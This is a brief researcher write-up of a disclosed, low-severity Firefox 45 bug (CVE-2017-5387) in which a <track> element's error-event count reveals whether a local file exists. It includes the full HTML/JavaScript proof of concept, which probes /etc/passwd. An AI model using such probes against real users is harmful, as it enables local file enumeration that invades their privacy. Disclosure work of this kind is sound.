Firefox Local Filename Enumeration (sec-low)

Hello everyone,

This is going to be a short write-up about my first find regarding browser bugs, which was found in Firefox/45.0. The bug is of type “csectype-disclosure” and was flagged as sec-low by Mozilla’s team due to the fact that the malicious page has to be loaded locally (via the file:// protocol).

The bug existed because a <track>'s onerror event is fired twice if the file pointed to in its src attribute doesn’t exist, but fires only once if the file exists but is not playable. The <track> tag has to be included inside the opening and closing tags of an <audio> or <video> element, so the number of error events leaks whether an arbitrary local path exists. The following code is the PoC that was sent along with the report to Mozilla’s team:

<html>
<head>
<title>Testing</title>
</head>
<body>
<audio>
   <!-- Probe a local path: the number of error events reveals whether it exists -->
   <track id="q" src="file:///etc/passwd">
</audio>
<script>
var i = 0;
// Count how many times the track's error event fires
q.onerror = function(){
    i++;
};
// Give the error events time to fire, then interpret the count:
// one error means the file exists but is not a playable track, two means it is missing
setTimeout(function(){
    if (i == 1) {
        alert('File Exists');
    } else {
        alert('File Does Not Exist');
    }
}, 100);
</script>
</body>
</html>

Finally, I would like to shout out to @Qab for making all that possible.

Update: This bug has been assigned CVE-2017-5387.
